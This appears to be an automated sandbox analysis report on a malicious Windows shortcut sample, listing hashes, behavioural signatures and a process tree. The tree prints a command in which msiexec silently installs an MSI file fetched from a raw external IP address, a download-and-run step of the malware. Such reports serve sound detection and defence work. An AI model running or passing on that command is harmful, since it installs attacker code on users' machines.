Analysis
  max time kernel:   60s
  max time network:  127s
  platform:          windows10-2004_x64
  resource:          win10v2004-20230220-en
  resource tags:     arch:x64, arch:x86, image:win10v2004-20230220-en, locale:en-us, os:windows10-2004-x64, system
  submitted:         07/06/2023, 02:45
Tasks
  Static task:      static1
  Behavioral task:  behavioral1
    Sample:    baff93a9574ff019ad8a1cff0b712d6f.lnk
    Resource:  win7-20230220-en
  Behavioral task:  behavioral2
    Sample:    baff93a9574ff019ad8a1cff0b712d6f.lnk
    Resource:  win10v2004-20230220-en
General
  Target:  baff93a9574ff019ad8a1cff0b712d6f.lnk
  Size:    2KB
  MD5:     baff93a9574ff019ad8a1cff0b712d6f
  SHA1:    bf927b871abbc068b7030e0e7b79797fa7bce59d
  SHA256:  fb48b9102388620bb02d1a47297ba101f755632f9a421d09e9ab419cbeb65db8
  SHA512:  37c94879618003ef04c96c3e63f37f91a80393bdf220a7e6522a7f5a4cd46badc6542499c916d0a348c453125377ae9698d392ee2c79162da89e629f8ac95e2a
Malware Config
Signatures

  Blocklisted process makes network request (1 IoC)
    flow  pid   Process
    8     2068  msiexec.exe

  Checks computer location settings (2 TTPs, 1 IoC)
    Looks up country code configured in the registry, likely geofence.
    description        ioc                                                                                                   Process
    Key value queried  \REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Control Panel\International\Geo\Nation  cmd.exe

  Use of msiexec (install) with remote resource (1 IoC)
    pid   Process
    4688  msiexec.exe

  Enumerates physical storage devices (1 TTP)
    Attempts to interact with connected storage/optical drive(s).

  Suspicious use of AdjustPrivilegeToken (32 IoCs)
    description                           pid   Process
    Token: SeShutdownPrivilege            4688  msiexec.exe
    Token: SeIncreaseQuotaPrivilege       4688  msiexec.exe
    Token: SeSecurityPrivilege            2068  msiexec.exe
    Token: SeCreateTokenPrivilege         4688  msiexec.exe
    Token: SeAssignPrimaryTokenPrivilege  4688  msiexec.exe
    Token: SeLockMemoryPrivilege          4688  msiexec.exe
    Token: SeIncreaseQuotaPrivilege       4688  msiexec.exe
    Token: SeMachineAccountPrivilege      4688  msiexec.exe
    Token: SeTcbPrivilege                 4688  msiexec.exe
    Token: SeSecurityPrivilege            4688  msiexec.exe
    Token: SeTakeOwnershipPrivilege       4688  msiexec.exe
    Token: SeLoadDriverPrivilege          4688  msiexec.exe
    Token: SeSystemProfilePrivilege       4688  msiexec.exe
    Token: SeSystemtimePrivilege          4688  msiexec.exe
    Token: SeProfSingleProcessPrivilege   4688  msiexec.exe
    Token: SeIncBasePriorityPrivilege     4688  msiexec.exe
    Token: SeCreatePagefilePrivilege      4688  msiexec.exe
    Token: SeCreatePermanentPrivilege     4688  msiexec.exe
    Token: SeBackupPrivilege              4688  msiexec.exe
    Token: SeRestorePrivilege             4688  msiexec.exe
    Token: SeShutdownPrivilege            4688  msiexec.exe
    Token: SeDebugPrivilege               4688  msiexec.exe
    Token: SeAuditPrivilege               4688  msiexec.exe
    Token: SeSystemEnvironmentPrivilege   4688  msiexec.exe
    Token: SeChangeNotifyPrivilege        4688  msiexec.exe
    Token: SeRemoteShutdownPrivilege      4688  msiexec.exe
    Token: SeUndockPrivilege              4688  msiexec.exe
    Token: SeSyncAgentPrivilege           4688  msiexec.exe
    Token: SeEnableDelegationPrivilege    4688  msiexec.exe
    Token: SeManageVolumePrivilege        4688  msiexec.exe
    Token: SeImpersonatePrivilege         4688  msiexec.exe
    Token: SeCreateGlobalPrivilege        4688  msiexec.exe

  Suspicious use of WriteProcessMemory (2 IoCs)
    description                         pid  Process  procid_target
    PID 616 wrote to memory of 4688     616  cmd.exe  85
    PID 616 wrote to memory of 4688     616  cmd.exe  85
Processes

  [1] C:\Windows\system32\cmd.exe  (PID 616)
      Command line: cmd /c C:\Users\Admin\AppData\Local\Temp\baff93a9574ff019ad8a1cff0b712d6f.lnk
      Signatures:
        - Checks computer location settings
        - Suspicious use of WriteProcessMemory

      [2] C:\Windows\System32\msiexec.exe  (PID 4688, child of 616)
          Command line: "C:\Windows\System32\msiexec.exe" /i http://185.166.217.184/JDXFHUIPGYN98P5GY87S43BF5TW4IYNP/attachment.msi /quiet
          Signatures:
            - Use of msiexec (install) with remote resource
            - Suspicious use of AdjustPrivilegeToken

  [1] C:\Windows\system32\msiexec.exe  (PID 2068)
      Command line: C:\Windows\system32\msiexec.exe /V
      Signatures:
        - Blocklisted process makes network request
        - Suspicious use of AdjustPrivilegeToken